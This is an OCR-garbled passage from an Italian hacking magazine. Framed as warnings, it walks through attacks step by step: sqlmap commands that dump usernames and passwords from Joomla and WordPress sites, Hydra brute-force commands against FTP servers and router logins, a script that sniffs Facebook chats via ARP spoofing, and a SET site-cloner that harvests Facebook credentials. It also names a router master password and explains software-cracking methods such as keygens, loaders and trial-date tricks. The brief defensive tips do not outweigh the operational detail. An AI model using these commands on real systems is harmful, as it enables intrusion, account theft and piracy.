tipologia di dato acquisito viene inserito nella relativa categoria 
, Mail Web. Chat VOIPecc.) 


► 
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Siti Web sotto assedio 


Siamo sicuri che i nostri bloa creati con Joomla e Wordpress siano al sicuro? Ecco come un pirata riesce ad ottenere 
I elenco degli utenti registrati con le relative password di accesso. 
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^ Le tabelle con i dati 

3 ! Ma il pirata può andare anche più a fondo, scoprendo quali tabelle 
compongono il database. Per farlo, lancia il comando python sqlmap. 
py -u URL. bersaglio -D Nome_Database -tables Anche in questo caso la 
durata del processo dipende dalla grandezza del database. 


^ Ecco i database 

2 - Il pirata digita quindi nel Terminale il comando python sqlmap.py 
•u URL_bersaglio ---dbs seguito da Invio per ricercare l'elenco dei 
database che compongono il sito Web. L’operazione dura diversi minuti ed è 
fortemente legata alla grandezza del bersaglio prescelto. 


-t Un tool tuttofare 

Da Applications, il pirata si sposta in BackTrack/Exploitation Tools / 
Web Exploitation Tools e avvia il programma sqlmap. Ricerca poi sul 
Web il bersaglio da attaccare accedendo ad una pagina interna del sito il cui 
indirizzo abbia una sintassi del tipo Mùtfid=". 


4 ; p er il pirata è giunto il momento di scoprire il nome delle colonne 
V contenute nelle tabelle appena visualizzate Per tarlo, digita quindi 
il comando python sqlmap.py -u URL bersaglio -D Nome .Database -T 
Nome. Tabella -columnse attende che sqlmap dia un risultato. 
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a Ancora più a fondo 

5 A questo punto, il pirata digita python sqlmap.py -u URL _ bersaglio 
-D Nome_Database -T Nome_ Tabella -C Nome_Colonna -dump 
per visualizzare in chiaro tutti gli indici di una precisa colonna (ad esempio, 
quella che contiene gli id degli utenti che accedono al sito). 


^ I dati di accesso sono qui 

g Al pirata non rimane altro da fare che impartire il comando python 
sqlmap.py -u URL_ bersaglio -D Nome_Database -T Tabella^user 
-C Colonna username (oppure Colonna_ passwd) -dump e visualizzare 
l'elenco completo contenente tutti i dati degli utenti registrati al sito! 
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FILE SYSTEM E SERVER FTP SONO A RISCHIO 


Come abbiamo visto nel Macropasso D, gra¬ 
zie a BackTrack il pirata riesce facilmente ad 
accedere a un sistema remoto.Tra i comandi a 
disposizione del malintenzionato (vedi Passo 
D5), ce ne sono alcuni relativi al controllo del 
file System. Digitando, ad esempio, il comando 
CD, riesce a spostarsi tra le cartelle dell’hard disk 
del malcapitato, mentre con LS ne visualizza 
il contenuto. 

Il software per scardinare l'FTP 

Fra le varie tecniche utilizzate dai pirati per 
entrare in possesso dei nostri file, lo sniffing è 
senza ombra di dubbio quello più completo, 
proprio perché ogni protocollo viene analizzato. 
Ma se l'obiettivo del malintenzionato è quello 
di scovare i nostri dati di accesso ad un server 
FTP, tutto diviene magicamente più semplice 
e, con un po'di fortuna, più breve. 

Grazie al software Hydra (anch'esco inte¬ 
grato in BackTrack 5 RI) il pirata rj 
sferrare un attacco di tipo brute 
al server FTP, scoprendo la chiave di 
accesso di un preciso nome utente. 

Appare evidente però che, almeno 
in questo caso, la lunghezza e la 


difficoltà della password concorrono alla ga¬ 
ranzia di maggiore sicurezza. Tutto sta anche 
alla ricchezza del dizionario utilizzato dal pirata. 
Negli attacchi di tipo brute force, infatti, non si 
fa altro che tentare numerose chiavi di accesso 
fino a beccare eventualmente quella corretta. 
Ma, con una breve ricerca sul Web, il pirata è 
in grado di scaricare un dizionario molto ben 
nutrito contenente migliaia se non milioni di 
combinazioni fra lettere e numeri differenti. 
Come si utilizza Hydra? Dopo aver avviato il 
Terminale al pirata non resta che digitare il 
comando hydra -I username vittima -p dizio¬ 
nario -f-Vindirizzo server ftp II processo ha 
durata variabile ed è fortemente dipendente 
dalla qualità del dizionario e dalla complessità 
della password utilizzata dalla vittima. 


0 Chat di 

I nostri dati di accesso al social 
anche le nostre conversazioni e 


Faceboo 


network non sono gli unici ad essere in perìcolo. I pirati sono in grado di leggere 
per farlo devono semplicemente usare uno script pronto all’uso. 



^ Lo script fond a mentale 

' ' Dopo aver awiaio BackTrack (Macropas¬ 
so A), il pirata si collega a Internet e avvia 
il browser Firefox dal menu Applications/lntemet 
Ricerca quindi direttamente su Google lo script 
borogove py e ne avvia il download Decide di 
salvare il file nella Home del sistema. 


▲ • La giusta sintassi 

Al termine del download, il pirata apre il 
fife appena scaricato utilizzando tm editor 
di testo (ad esempio. Gedit ) per scoprirne la sin 
tassi d'uso Dovrà infatti indicare l'interfaccia uti¬ 
lizzata < Ethernet o Wi-Fi), l'indirizzo IP da colpire 
e il Gateway fleto LAN. 


ai Script in azione! 

3 A questo punto, non deve fare altro che 
- J avviare una nuova sessione del Terminale 
e far partire lo script (nel caso in esempio, python 
borogove. py ethO 192.168.1.12 192.168.1.1) 
Tutte le eventuali conversazioni su Facebook della 
vittima verranno mostrate in chiaro ► 
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SITECLONER 


Usando questa opzione 
del programma set, il 
pirata attua un attacco 
di tipo ARP, ovvero 
intercetta le richieste 
di un dient per dirot¬ 
tarle su un altro host (in 
questo caso, il suo com 
puter). Cosi facendo, 
riesce a reindirizzare 
la vittima sulla pagina 
di login clonata di Fa- 
cebook. 

GEDIT 

Si tratta di un editor 
di testo non format¬ 
tato (òoe privo delle 
formattazioni tipiche 
che è possibile aggiun¬ 
gere, ad esempio, con 
Word: allineamento, 
paragrafo, interlinea 
ecc) integrato in molte 
distribuzioni Linux. 

GATEWAY 

Permette di dirottare i 
pacchetti in arrivo dal 
Web verso la rete inter¬ 
na. Generalmente, il 
suo indirizzo corrispon¬ 
de con TIP del router. 
Un pirata che dovesse 
riuscire a prendere il 
controllo del gateway 
riuscirebbe, ovviamen¬ 
te, a monitorare tutto 
il traffico di una rete 
locale. 


9 Entrare nel profilo Facebook 

Usando l’ennesimo tool di hacking integrato in BackTrack Linux, il pirata riesce a creare 
una copia della schermata di accesso ài social network per rubare i nostri dati personali. 



< Attacchi psicologici 

' Dopo aver avviato BackTrack (Macropasso A), il pirata 
si sposta nella sezione BackTrack del menu Applica¬ 
tions. Da Exploitation Tools/Social Engineering Tools/Social 


* L’attacco arriva dal Web 

2 ' Per il pirata è arrivato il momento di scegliere che tipo di 
attacco sferrare: le opzioni tornite da set sono veramen¬ 
te tante ma, poiché ha deciso di clonare un sito Web, digita 2 



2 l Ecco un punto cruciale della sua opera di attacco: il pira¬ 
ta digita 3 e conferma con Invio per scegliere l'opzione 
Credential Harvester Attack Method : cosi facendo, il clone di 
Facebook sarà in grado di fornire al pirata le credenziali di acces¬ 
so digitate dalla vittima 


Al pirata non resta che digitare 2 e confermare ancora 
una volta la scelta premendo Invio. Così facendo, sce¬ 
glierà l'opzione Site Cloner di set mediante la quale il software 
si occuperà di clonare l'intero contenuto di una pagina Web che 
a breve II pirata indicherà. 



Il sito è preso di mira 

Ej A questo punto, set chiede al pirata di immettere l'URL 
del sito Web da clonare. Digita quindi https://www. face- 
book.come conferma premendo Invio L'operazione dura diversi 
secondi durante i quali l'intero codice della home page di Face¬ 
book viene scaricato sul PC. 


j. Password in chiaro! 

0 ] Qualsiasi computer connesso alla rete locale che tenta 
■ -, di accedere a Facebook visualizza quindi il clone appena 
creato dal pirata. Ma la vittima, ignara di tutto, digita i suoi dati 
di accesso per la gioia del pirata che li vede in chiaro diretta- 
mente sul Terminale. ■ 


24 Win Maga/me Speciali 
















































The Reliable Choice 


utto r Entertainment che vuoi 
Ovunque 

Wireless 



Smart TV 


Entertainment Adapter Wireless Dual Band N60Q 
con 4 porte Ethernet 

TL-WA890EA 


jgina di portare tutti i dispositivi collegabili ad Internet, a casa o in ufficio, • ic do Jel wireless. TD-WA890EA ti consentirà di eliminare 
i cavi, notoriamente antiestetici ed ingombranti, senza alcun impatto sulle pei io nr .ce Con 4 porte LAN ed una velocità di collegamento 
ess fino a 300Mbps a 2.4GHz o 5GHz, TD-WA890EA consente ogni tipo di applica 2 >r• ;mpr ,i streaming HD e D, musica e giochi 


4 10/1 OOMbps LANPorts 


300Mbps sia su 


5GHz 300Mbps 


oppure 


2.4GHz 300Mbps 


Compatibilità 

Universale 


Fornisce la connessione Wi-Fi a qualsiasi dispositivo con una porta Ethernet. 


Smart TVs Set-top-box Videogiochi Lettori Biu-ray® Stampanti Desktops 


laptops E ancora 


Email: sales.it@tp-link.com Specilfchesóggeiwavirteior* senza preavviso TP-UNk è immette 

4M ITALIA S.R.L c .. . . ... 

Sito internet: http://www.tp-l,nk.it/ ^ ,, v .. ........ ,, , NK tiov ,. ••.. 


V 11— 1 











Così entri in 
qualsiasi computer 

Ecco la tecnica usata dai pirati per intercettare le connessioni di 
Rete. E così accedere a qualunque PC diventa un gioco da ragazzi 


L a nostra storia ha inizio col "DNS 
dinamico", o “dynamic DNS", nome 
tanto caro ai professionisti della Rete 
e che sottende la tecnica grazie alla quale 
è possibile associare un normale dominio 
Internet ad un indirizzo IP, ci*ie quel¬ 
lo della nostra linea ADSL. Gmzie *yn 
DNS dinamico, ottenibile grat 
rivolgendosi a servizi on-line (leggi 
in basso), è possibile fruire di tutti i van¬ 
taggi di possedere un IP statico pur non 
avendolo (quello assegnatoci dai provider 
generalmente è dinamico, ossia cambia 
ad ogni connessione). Ed è cosi che, con 
enorme comodità, possiamo visualizzare 
i file memorizzati nel nostro NAS o ma¬ 
gari dare una rapida occhiata alle impo¬ 
stazioni del nostro router anche quando 
siamo in ufficio o durante un viaggio. Il 
tutto semplicemente ricordando il no¬ 
me di un dominio Internet (ad esempio 
http://tuonome.nomeservizio.org): sarà il 
servizio di DNS dinamico a occuparsi di 
tradurlo nell'indirizzo IP effettivo asse¬ 



gnatoci dal provider per quell’istanza di 
connessione. Tutta la flessibilità di questa 
soluzione ha il suo scotto da pagare! Dob¬ 
biamo stare molto attenti: anche in questo 
caso, il pirata è sempre pronto a sferrare 
i suoi attacchi e violare la nostra privacy. 

Cosa può fare il pirata? 

do c’è di mezzo una password o la 
ità di entrare in possesso di dati 
alti^fT,^ pirata cer<^ di escogitare qual¬ 
che nuov^^fL^ftà# eiaggiungere il suo 
obiettivo. Cont4$j^)bfu$?tu scoperto, un 
DNS dinamico pu^rereiintefp come 
un vero e proprio doml^Wi^rJkt (al 
pari di un classico sito WebTa^j urne* ’ 
ne associato l’indirizzo IP di ut! 
un NAS o qualsiasi altro dispositivcTio 
grado di connettersi in Rete. Dopo aver 
settato correttamente ogni parametro è 
dunque possibile accedere al pannello 
di amministrazione della periferica in 
esame modificandone le impostazioni o 
visualizzandone i file in essa contenuti 


o, nel caso di un router, visualizzando 
la password della nostra rete senza fili: 
è proprio qui che entra in azione il pi¬ 
rata! Utilizzando particolari strumenti 
di analisi è in grado di forzare la chiave 
di accesso che serve a gli impedirgli di 
prendere pieno possesso del dispositivo da 
noi configurato. Non importa che si tratti 
di un preciso modello di router o di una 
IP Cam, qualsiasi interfaccia di gestione 
può essere violata e la semplicità con cui 
riesce a terminare la sua opera ci lascerà 
realmente senza parole. 


L’attacco è bruteforce! 

Come nella maggior parte dei casi, anche 
lesta volta il pirata fq affidamento ad 
n^cRstribuzione Linux nella quale sono 
pi numerosi tool di analisi di rete 
genialmente utilizzati dai professioni¬ 
sti per testare la sicurezza della propria 
LAN. Stiamo parlando di Backlrack, or¬ 
mai giunta alla sua quinta versione e da 
sempre amala dai pirati di tutto il tnon- 


POSSIAMO FIDARCI DEI SERVIZI CHE 
OFFRONO UN DNS DINAMICO GRATUITO? 


Fra i servizi che offrono un 
dominio DNS dinamico in 
maniera del tutto gratuita, 
DynDNS (www.dyndns.it) e 
No-IP (www.no-ip.com) sem¬ 
brano essere quelli preferiti 
dagli utenti di tutto il mon¬ 
do. Ogni dominio registrato 
prevede un nome utente e 
una password associati all’ac- 
count creato. Accedendo poi 
al pannello di amministra¬ 
zione del dominio possiamo 
impostare tutti i parametri 
della nostra linea locale in 


modo da renderla disponi¬ 
bile anche sul Web. Ma questi 
due servizi sono sicuri? Per il 
pirata riuscire ad ostacolare 
la protezione presente sui siti 
Web dei due provider non è 
cosa semplice poiché il grado 
di sicurezza dei server, per 
ovvie ragioni, è molto alto. 
Uno fra i metodi che può 
adottare per appropriarsi 
anche di questi dati è instal¬ 
lare un keylogger sul nostro 
PC, registrando dunque 
tutti i caratteri digitati. In 


ogni caso, se proprio desidera 
entrare in possesso anche di 
questa nostra password potrà 
raggiungere il suo obiettivo 
dopo aver violato le prete 
zioni dell'interfaccia Web del 
nostro router: raggiungendo 
infatti il giusto menu potrà vi¬ 
sualizzare il nome utente e la 
password necessari all'acces¬ 
so al dominio DNS dinamico, 
proprio perché, affinché tutto 
funzioni, tali dati devono es¬ 
sere necessariamente inseriti 
anche sul nostro router. 
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A COSA SERVE IL DDNS 


gurando un DNS Dinamico è possibile accedere alle periferiche di casa collegate 
al nostro router (NAS, IP Cam, decoder satellitari Linux ecc.) anche quando siamo 
o in qualsiasi altro angolo di mondo. Basta disporre di un PC/smartphone 
• e inserire il nostro indirizzo DDNS personale 


do. Al pirata basterà scaricarla dal sito 
Web ufficiale, masterizzarla su un DVD 
(o creare una chiavetta USB avviabile) per 
accedere subito al sistema senza neanche 
installarlo. Poiché ogni dispositivo ha una 
sua interfaccia Web ben diversa dalle altre, 
l'unico strumento universalmente valido 
he il pirata può usare è provare con un 
attacco di tipo "bruteforce". Di cosa si 
tratta? In poche parole, il software non 
farà altro che tentare ('inserimento 
di numerose password di accesso 
fino a trovare quella corretta. Appare 
evidente dunque che affinchè l’ope¬ 
ra del pirata possa avere una buona 
percentuale di riuscita è estrema- 
mente importante per lui munirsi 
di un dizionario contenente un aito 
numero di parole o combinazioni 
casuali di lettere. Da dove prelevar¬ 
lo? Nel caso in cui il pirata sospetti 
che la password in esame non sia poi 
cosi difficile potrà sfruttare quello 
già integrato in BackTrack. Nel ca¬ 
so in cui la chiave si dimostri più ardua 
del solito gli basterà fare un salto sulla 
Rete per prelevare decine di differenti 
dizionari molto ben nutriti (basti pensare 
che alcuni di questi possono raggiungere 
anche dimensioni di 5 GB!). Già da ora è 
possibile int uire che per mettere i bastoni 


fra le ruote al pirata chF\tf|òl£ \Ma JJfcre la 
nostra privacy ci basterà pen^MBd^oa 
password molto complessa ed il piò lunga 
possibile: maggiore sarà la sua difficottfc 
minore sarà la probabilità che il dizionario 
da lui utilizzato sia in grado di scovarla. 

Hydra: il tool dell’hacker 

Lo strumento software contenuto in Bac¬ 
kTrack che il pirata utilizza per sferrare 


Anche se dotate di login 
protetto da password, le 
periferiche di rete possono 
essere attaccate con dati 
d'accesso di de fault previsti 
dal produttore 


fronte a problematiche legate all’utilizzo 
di un software e dal doverdigitare qualche 
mando testuale da Terminale. Beco per- 
pferisce la versione Linux del tool. Il 
scoglio che dovrà superare prima 
di eSIguire l’attacco bruteforce con Hydra, 
è l’eventualità di specificare un utente 
per accedere alia risorsa di Rete remota 
che prevede un login. Anche in questo 
caso il pirata non si dispera: la stragran¬ 
de maggioranza delle periferiche in 
circolazione (router, NAS. IP Cam...), 
pur offrendo la possibilità di creare 
nuovi utenti autorizzati all’accesso al 
pannello di amministrazione, preve¬ 
de ”admin" come username princi¬ 
pale. E se l’interfaccia Web del nostro 
dispositivo è provvista del sistema di 
protezione SSL? Al pirata basta ag¬ 
giungere alla stringa digitata (Passo 
5) il parametro -S pe r superare age¬ 
volmente anche questo ostacolo. Le 
potenzialità di Hydra sono ormafpiù 
che evidenti! 


il suo attacco bruteforce è Hydra. Questo 
tool da qualche anno è disponibile anche 
su piattaforma Windows ma nort ne ha 
ereditato tutta la potenzialità ed i parame¬ 
tri aggiuntivi presenti nella sua versione 
Linux. Un pirata che si rispetti, però, non 
è per nulla preoccupato di ritrovarsi di 


Non solo forza bruta 

La durata dell’attacco bruteforce è for¬ 
temente legata alla complessità della 
passw'ord da trovare. Ma in alcuni casi al 
pirata bastano davvero pochi secondi per 
raggiungere il suo obiettivo. La prima e 
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DNS 

Acronimo di Domain 
Nanne System è il 
meccanismo secondo II 
quale viene assodato 
un nome a dominio (Jt, 
com, .net, ecc..)ad un 
indirizzo IPfisico. 

SSL 

È un protocollo Internet 
secondo il quale tutti 
i dati che viaggiano 
in Rete vengono crit- 
tografati in modo da 
non essere identificati 
dal pirata che cerca di 
appropriarsene. 

BRUTEFORCE 

Tipo di attacco informa¬ 
tico che prevedere l'uti¬ 
lizzo di un dizionario. 
Viene tentato l'inseri¬ 
mento di tutte le parole 
presenti nel dizionario 
(solitamente un file 
di testo fino a scovare 
quella corretta. 

WLANO 

Nel mondo Linux con 
questo termine si ìn¬ 
dica linterfacda Wi-Fi 
integrata nel PC. La 
scheda direte Ethernet 
integrata è invece chia¬ 
mata ethO. 


sa 


fondamentale fase della sua opera, 
infatti, è sempre l’osseryazione: 
raggiungendo il nome del dominio 
DNS dinamico potrà subito venire 
a conoscenza del produttore e del 
modello del prodotto a cui vuole 
accedere. Il pirata che non è pro¬ 
priamente alle prime armi sa be¬ 
nissimo che esistono delle vulne¬ 
rabilità note per alcuni dei dispo 
sitivi più diffusi, come ad esempio 
il routér Netgear WG602: con una 
rapida ricerca sul Web si 
scopre infatti che esiste 
una password di ammi¬ 
nistrazione standard 
(detta master password) 
utilizzata dai tecnici per 
accedere facilmente alle 
principali impostazioni 
del router. Tale scoperta 
non dovrebbe poi lasciar¬ 
ci senza uarole conside¬ 
rato chenA^er il BIOS 
del nosm^^To 
per molti altri 
vi esiste un passepàr 
che potrebbe essere util 
pirata per altri scopi ben pitTpi 
colosi. Nel caso del router Netgear 
sopraccitato, il nome utente e la 
password di accesso Universali 
pare siano rispettivamente "Ge- 
arguv" e "Geardog": se siamo in 
possesso di questo modello di ro¬ 
uter non ci resta che provarne la 
vulnerabilità ed eventualmente 


correre ai ripari installando un 
aggiornamento del firmware o 
contattando direttamente il pro¬ 
duttore per cercare di trovare una 
soluzione al problema. 

Alcune regole 
per proteggersi 

È ora evidente che il vero pericolo 
non è il DNS dinamico in quanto 
tale, ma l’interfaccia di gestione dei 
nostri dispositivi. E, poichéalmeno 



Evitiamo di diffondere il 
nostro indirizzo DNS dinamico. 
Un pirata potrebbe usarlo 
per accedere airinterfaccia 
del nostro router e a tutte le 
periferiche collegate 


al momento non è proprio possibile 
mi una soluzione definitiva 
i di tipo bruteforce, non 
cTr 

minim' 
dinamici, et 
evitare di confi 
spositivi installati nelftt nps 
domestica e limitiamoci ai 
esclusivamente quelli che ritem? 



mo realmente indispensabili an- 
chequando siamo lontani da casa. 
Per questi cerchiamo di scegliere 
parole chiave molto lunghe (anche 
se la maggior parte delle volte non 
è assolutamente possibile inserire 
più eli 8 caratteri). Su quei dispo 
sitivi che lo consentono (come ad 
esempio i decoder satellitari basati 
su sistema operativo Linux come il 
Dreambox) rinunciamo all’inter¬ 
faccia Web per fare spazio ad una 
connessione di tipo SSU, 
ben più difficile da vio 
lare anche per un pirata. 
E prestiamo pure molta 
attenzione a ciò che in¬ 
quadrano le IP Cam in¬ 
stallate all'interno delle 
nostre case: se il pirata 
riesce ad accedere all'in¬ 
terfaccia di gestione del 
router, è per lui un gioco 
da ragazzi scoprire infatti 
tutte le altre periferiche 
ad esso connesse, anche 
se su di esse non ò stato 
configurato alcun servizio per la 
visione all’esterno della rete. Per 
assicurarci un minimo di prote¬ 
zione in piti evitiamo quindi di 
diffondere il nostro dominio DNS 
dinamico: se nessuno verrà a cono¬ 
scenza della sussistenza difficil¬ 
mente qualchejùrata sarà curioso 
li scoprire cosa si cela nella nostra 
rete locale! 


// 


LE PASSWORD STANDARD VANNO ASSOLUTAMENTE CAMBIATE! 


A volte, per negligenza o per altro, dimenti¬ 
chiamo di impostare una chiave personalizzata 
all'Interfaccia Web dei dispositivi che abbiamo 
installato nella nostra rete domestica. Alcuni di 
questi permettono l'accesso alle impostazioni in 
maniera diretta, per altri é invece necessario in¬ 
serire la password standard settata direttamente 
dal produttore. Se ciò ci fa pensare di essere 
comunque al sicuro siamo completamente fuori 
strada. In Rete esistono infatti numerosi siti 
grazie ai quali è possibile scoprire le cosiddette 
master password (o default password) di qual¬ 
siasi dispositivo attualmente in circolazione. 
Fra questi segnaliamo ad esempio www.de- 
faultpassword.com: dopo aver raggiunto la 
home page del sito, al pirata basta inserire il 
nome del produttore e del relativo modello 
(solitamente visualizzati nella pagina princi¬ 
pale dell'Interfaccia Web del dispositivo sotto 
attacco) per scoprire quali dati deve inserire! Il 
nostro consiglio è dunque quello di provvedere 


all'inserimento di una chiave personalizzata potremo rendere più difficile la vita al pirata 
abbastanza lunga e preferibilmente contenen- che molto probabilmente non sarà in grado di 
te combinazioni di lettere e numeri. Solo cosi raggiungere il suo obiettivo. 
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Pericolo DN5 dinamico 
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Non c’è login che tenga 

Per il pirata che conosce l’indirizzo di un DNS dinamico, scoprire le password è un gioco da 
ragazzi. Ecco come scova la chiave di accesso alle impostazioni del nostro router! 



Masterizza DVD degli hacker 

*| - Per iniziare la sua opera il pirata ha bisogno della distri- 
1 buzione Linux BackTrack: raggiunge quindi il sito Web 
www.backtrack-linux.org e si spostajMlÉj»zipne Download 
per scaricare l'ultima release disponibne^epiijn masterizza 
su un DVD vergine il file .iso scaricato. 
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a Avvio dairunltà ottica 

^ Quando il processo sarà terminato, il pirata riavvia il 
) PC ed accede al BIOS per impostare il boot da DVD 
Quest'operazione varia in base al tipo di scheda madre in uso. 
Inserisce poi nel lettore il disco di BackTrack masterizzato in pre¬ 
cedenza e ne attende il caricamento. 
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ANCHE IN LAN 

Il software Hydra, 
integrato in BackTrack 
è utile al pirata anche 
per scovare le password 
di dispositivi locali. 

Nel caso in cui abbia 
accesso alla nostra rete 
senza fili gli basterà 
digitare nel terminale 
il comando "dhdient 
wlanO" per scoprire 
TIP del router. Gli sarà 
sufficiente, dunque, 

4 inserirlo nella stringa 
analizzata al Passo S 
(al posto dell'indirizzo 
del DNS dinamico) per 
raggiungere il suo 
obiettivo. 


La giusta modalità 

2 : Utilizzando le frecce direzionali della tastiera il pirata ^ ; 
seleziona l'opzione BackTrack Text - Default Boot Text w 


Mode e conferma con Invio Con questa modalità potrà accedere 
alle periferiche installate sul PC. prima fra tutte la scheda di rete, 
fondamentale per il raggiungimento del suo scopo. 



^ L’interfaccia grafic a 

Dopo solo qualche secondo appare un’interfaccia testua¬ 
le. Per utilizzare un ambiente grafico piu intuitivo e meno 
ostico il pirata digita startx e conferma con Invio. Attende quindi 
il caricamento del desktop di BackTrack 5. Da qui clicca sull'ico¬ 
na Terminale presente nella barra superiore 



-k. : Il pirata in azione 

5 A questo punto l'hacker entra nel vivo dell’operazione, 
w digita il comando hydra -ladmin -P /pentest/passwords' 
wordlist/darkcOde.Ist -e ns -f-VINDIRIZZO_DA_ATTACCARE 
http-get/e conferma con Invio per iniziare l’attacco bruteforce 
sulla pagina di login del router bersaglio 


Obiettivo raggiunto! 

0 L’operazione può durare da qualche minuto a diverse ore. 

Tutto dipende dalla lunghezza e ‘dalla difficoltà della pas¬ 
sword impostata come login al router o a qualsiasi altro dispo¬ 
sitivo attaccato. In caso di esito positivo apparirà a schermo un 
messaggio di conferma seguito dalla chiave di accesso. 
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| La fabbrica del crack | 


Nella fabbrica ■ 
dei crack software 

Viaggio tra i nodi underground del Web alla scoperta delle tecniche 
proibite che sbloccano tutte le funzioni dei programmi a pagamento 


U no su due è pirata, e non stiamo par¬ 
lando delle imbarcazioni che attraver¬ 
sano l’oceano indiano e sequestrano 
le navi mercantili e commerciali, bensì dei 
programmi installati sui PC di noi italiani. A 
lanciare l'allarmeè il direttore della divisio- 


alla tentazione, e la recente assoluzione di 
un libero professionista che deteneva ben 17 
mila euro di software crackati sentenziata 
del tribunaledi Bologna, la dice lunga sulla 
difficoltà che incontrano le software house 
nel contrastare la pratica della pirateria in¬ 


coi valore reale; ora, grazie alla diffusione 
della banda larga, la risorsa più battuta è 
senz'altro la Bete. Proprio come avviene 
per film e musica, le ricerche nelle reti P2P 
restituiscono risultati per tutte le esigenze. 
Kicerchc su eMule o nelle reti BitTorrent con- 


ne italiana Microsoft, che si octApanroprio 
di questo fenomeno. Mentre in fiìi^ua la 
percentuale si attesta sul 33% circajitft i 
49% dei software commerciali è contrai 1 
I privati, comunque, non sono gli unici uti¬ 
lizzatori di software a sbafo: anche aziende 
e imprenditori cedono spesso e volentieri 



formatil a nel Bel Paese. 

A ognuno il suo crack 

;di per entrare in possesso di un software 
tono molti. Un tempo venivano scam¬ 
bili amici e coUeghi o acquistati sulle 
liiini in lini se confrontati 


sentono ai pirati di reperire ogni genere di 
programma commerciale completo di crack 
e istruzioni per applicarlo. Anche forum, 
blog e siti Web, cui si arriva con una semplice 
ricerca su Google, sfruttando la banda offerta 
dai servizi di file hosting, possono contare 
su una veloce distribuzione del materiale 


IL WIKI DEI PIRATI 

IL TERMINE CRACK RACCHIUDE TUTTI I METODI DI ATTIVAZIONE ILLEGALE 
DI UN SOFTWARE, MA IN REALTÀ NE ESI5T0N0 DI DIVER5E CATEGORIE 


PATCH 

Con questo fermine si Indica una tipologia di crack 
che consiste nella sostituzione dei file originai! del 
programma Quelli nuovi sono opportunamente 
modificati per non richiedere l’attivazione del 
software. 

NO-CD/DVD 

Tecnica utilizzata soprattutto nel mondo dei 
videogame pirata: la modifica all’eseguibile 
bypassa il controllo del supporto, consentendo 
l’avvio del titolo senza disporre del DVD originale. 

LO ADE R 

In questo caso, il crack viene eseguito al volo 
durante il caricamento dell’eseguibile Non 


alternando i file originali, questo tipo di crack 
supera anche i controlli anticapia CRC (Controllo 
a Ridondanza Ciclica) usati dai sistemi operativi. 

KEYGEN 

Alcuni software nascondono l'algoritmo di 
generazione del seriale alfinferno del programma 
stesso. Questa permette ai cracker di realizzare 
tool (i keygen appunto) che estraggono dal 
software la chiave di attivazione. 

NOLIMIT 

La modifica della data di sistema permette a 
questo tipo di crack d’ingannare le versioni trial dei 
software commerciali, facendogli credere che non 
sia ancora scaduto il periodo di prova. 
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opportunamente contraffatto. 1 file che si 
scaricano da queste risorse, generalmente, 
consistono di archivi compressi oimmagini 
in formato ISO di CD e DVD che, insieme 
ai file d’installazione del programma, com¬ 
prendono quanto occorre per crackarlo 
o attivarlo illegalmente. In alternativa, è 
possibile anche servirsi delle versioni trial 
disponibili sul sito Web dei software, sca¬ 
ricando dai suddetti canali "proibiti" solo 
ì patch di attivazione. Conclusa l’installa- 
lone del software, al pirata basta seguire 
le istruzioni che illustrano la procedura di 
r • ivazione del crack. Poiché tali procedu¬ 
re variano a seconda del software, anche 
quelle illegali si differenziano per tipologia 
e modalità di applicazione. 


Software a lunga scadenza 

Con un’utility come RunAsDate i pirati riescono ad allungare aH’infinito le versioni di prova dei software 
a pagamento. Lo scopo di RunAsDate è infatti quello di ingannare la verifica della data di sistema. Ecco come. 


•j il pirata non fa fatica a 
j ca su Google lo porta facilmente 
l'applicazione. Estratto l'archivio, il pirata avvia 
richiede installazione. 


sul Web: una licer - 
scaricare 
che non 


Scadenza derogata 


sui Web 




2 II pirata sceglie il software commerciale da “sbloccare": per far* 
lo, naviga alla ricerca del collegamento usato per avviarlo. Indica 
quindi una data precedente, anche di un solo giorno, rispetto a quella 
di scadenza del periodo di prova e applica le modifiche. 

• _ 


nascondono lai 
nc del le chiavi nel prò] 

Dove non arrivano cracke 
pensano! loadere i NoLimit. Pamcmy 
mente adatti perbypassarel’attivazione® 
di software e sistemi operativi Micro¬ 
soft, i loader riescono a superare anche 
i controlli CRC(Controllo a Ridondanza 
Ciclica) che i sistemi antipirateria dei 
software applicano su se stessi, mentre 
i NoLimit, alterando la data del sistema, 
consentono di allungareaU’infinito le 
versioni di prova dei software commer¬ 
ciali. Insomma, nonostante gli sforzi, 


le software house riescono a malapena 
ad arginare il problema della pirateria. 

Alternativa legale 

JFp®zfcU esorbitante di alcuni software 

cmrim 


re zqe; 
■i uiernt 

irs^ich 


iali, giustificato dalle ingenti 
risors^ichieste per il suo sviluppo, che 
può arrivare anche a diverse migliaia di 
euro, è il motivo principale per cui so¬ 
no in tanti a spingersi oltre le colonne 
d’Èrcole della legalità per approdare sui 
lidi sconosciuti (e a volte pericolosi) della 
pirateria. Tuttavia, in molti casi, gli utenti 
utilizzano software pirata solo perché non 


COL CRACK E SENZA INSTALLAZIONE 


• Nel caso di attivazione median¬ 
te crack, il pirata sostituisce il file 
eseguibile originale del programma 
con un file, apparentemente simile, 
riscritto dal cracker (colui che crea il 
crack) per bypassare la richiesta del 
codice di attivazione. 

• Meno invasivi ma altrettanti validi, 
i keygen sono particolari tool che 
consentono di generare un serial per 
arrivare alla validazione dell’instal¬ 
lazione tramite la normale procedura 
di attivazione. Il keygen può essere 
ut i lizzato solo per quei programmi che 


Uno dei siti più utilizzati dai pira¬ 
ti informatici è PortableAppz, da 
cui è possibile scaricare versioni 
portable di molti software, ma 
anche programmi commerciali 
crackati che non necessitano 
di installazione per funzionare. 
Questi ultimi sono, in realtà, dei 
normali archivi compressi auto- 
estraenti (in formato PAF): basta 
solo indicare la cartella o il drive 
di destinazione, dopodiché per 
avviane i programmi si ricorre 
allEXE che si trova all'interno 
della cartella Per crearli, i pirati 


usano strumenti come Portable 
AppCreatoroVMwareThinApp. 
Ricorrendo a questi strumenti, 
sono in grado di registrare tutte 
le modifiche che avvengono nel 
sistema durante l’installazione 
e l’attivazione di un software. 
L'archivio restituito da WmVare 
ThinApp, ad esempio, permette 
di usare il software su qualun¬ 
que PG senza bisogno di ripete¬ 
re setup e attivazione. Si tratta 
di programmi portable a tutti 
gli effetti che, assieme ai file 
necessari per l'esecuzione, in¬ 



tegrano anche il serial key con il 
quale sono stati attivati. Oltre ai 
software commerciali, i pirati 
usano questo stratagem¬ 
ma per confezionai 
anche videoga¬ 
me pronti per 
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conoscono prodotti alternativi disponibili 
gratuitamente. Eppure, basterebbe solo 
guardarsi attorno per scoprire un mondo 
di eccellenti programmi open source che 
non hanno nulla da invidiare a blasonati 
«costosi software con analoghecaratteri- 
stiche. Software come The Gl MP, Infra Re¬ 
